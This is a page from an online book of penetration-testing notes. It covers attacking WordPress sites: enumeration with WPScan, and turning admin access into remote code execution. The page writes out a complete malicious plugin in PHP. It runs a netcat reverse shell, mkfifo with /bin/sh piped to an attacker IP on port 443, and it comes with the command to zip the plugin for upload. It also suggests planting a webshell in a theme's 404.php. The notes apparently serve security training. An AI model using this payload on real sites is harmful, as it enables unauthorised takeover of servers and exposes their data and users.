Hacking Notes
  • What is this?
  • Reconnaissance 🗣
    • Information Gathering 🗣
  • Enumeration 🎯
    • Host Discovery 🛎
    • DNS Enumeration
    • OS Discovery 🖥
    • Port Scanning 📟
    • WAF Evasion
  • Web 📱
    • Unrestricted File Upload
    • Templates Injections ✖️
    • File Inclusion
    • Login Panes
    • SQL Injection
    • NoSQL Injection
    • OAuth 2.0 Bypass
  • Privilege Escalation
    • Linux Privesc
    • Windows Privesc
    • Run Commands AS
  • Post Explotation 💀
    • Port Forwarding and Tunneling
    • Transfering Files 📤
    • Reverse Shell 🔙
    • Crypto 101 👁
    • AV Evasion
    • Bypass UAC
    • Get Credentials
  • Services
    • PORT 21/tcp - FTP
    • PORT 25/tcp - SMTP
    • PORT 53/tcp/udp - DNS
    • Port 80,443/tcp - HTTP
    • Port 111/tcp - RPCBind
    • PORT 143,993/tcp - IMAP
    • PORT 139,445/tcp - SMB
    • PORT 161/udp - SNMP
    • PORT 1100/tcp - Java RMI
    • PORT 1433/tcp - Microsoft SQL Server
    • PORT 2049/tcp - NFS
    • PORT 3306/tcp MySQL
    • PORT 3389/tcp RDP
    • PyPI Server
  • Software
    • Tomcat
    • Jenkins
    • Drupal
    • Wordpress
  • Client-Side Attacks
    • Evil PDF
    • Microsoft Office Macros
  • Other
    • Hacking WiFI
      • WPA/WPA2 PSK
      • WPA/WPA2 PEAP (Enterprise)
      • WEP
    • Hacking with Powershell
    • Hacking AWS
  • Exploiting
    • Buffer Overflow
  • Active Directory
    • 🖥️AD Attacks
Powered by GitBook
On this page
  • WPScan
  • From Admin to RCE
  • Theme Editor
  • Installing Plugin

Was this helpful?

  1. Software

Wordpress

Wordpress is maybe the most common CMS on internet.

WPScan

wpscan --url http://example.com -e ap,at,cb,dbe,u1-5,m1-15 --api-token <APITOKEN>

From Admin to RCE

Theme Editor

We can modify a theme by adding a reverse shell or a webshell on the 404.php file.

Installing Plugin

Another way to obtain a reverse shell is to upload and install a plugin. It is important to add the comment lines in order to a successful installation.

<?php
    /*
    Plugin Name: HackinNotes Wordpress Shell
    Plugin URI: https://github.com/leonjza/wordpress-shell
    Description: Execute Commands as the webserver you are serving wordpress with! Shell will probably live at /wp-content/plugins/shell/shell.php. Commands can be given using the 'cmd' GET parameter. Eg: "http://192.168.0.1/wp-content/plugins/shell/shell.php?cmd=id", should provide you with output such as <code>uid=33(www-data) gid=verd33(www-data) groups=33(www-data)</code>
    Author: Leon Jacobs
    Version: 0.3
    Author URI: https://leonjza.github.io
    */

system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 443 >/tmp/f");?>

After that we just need to zip it and install.

zip revshell-plugin.zip revshell-plugin.php
PreviousDrupalNextEvil PDF

Last updated 3 years ago

Was this helpful?